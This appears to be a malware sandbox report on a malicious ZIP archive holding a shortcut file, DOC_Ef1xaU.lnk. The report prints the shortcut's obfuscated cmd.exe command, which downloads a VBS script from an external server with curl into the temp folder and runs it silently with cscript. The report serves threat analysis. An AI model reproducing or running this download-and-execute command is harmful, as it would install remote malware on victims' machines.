Malicious

70b258a8f23674355ced1074c047112d

ZIP Archive | MD5: 70b258a8f23674355ced1074c047112d | Size: 1.17 KB | application/zip

Artefacts
Name: LNK: Command Execution
Value:
cmd.exe /v:on /c "set jMfXV23oc=qDonb0&& set aSTQr8lf3GOjLs=curl&& set ULVHE1BXp=7i3I7cfZU&& set TQTiYX3LkUZ=cscript&& set xK0ZOWmhsbM=%temp%\ErF9GkDf.vbs&& set QTOrRtCKXNz=https://vmi3176001.contaboserver.net/md/kaykabr/mytZ6RgwWd.vbs&& set R9yz1ZsZ4a=sLbUYSaay&& !aSTQr8lf3GOjLs! -skLo "!xK0ZOWmhsbM!" "!QTOrRtCKXNz!"&& !TQTiYX3LkUZ! //nologo //b "!xK0ZOWmhsbM!""

70b258a8f23674355ced1074c047112d (1.17 KB)
No malware configuration was found at this point.
Malicious

70b258a8f23674355ced1074c047112d > DOC_Ef1xaU.lnk
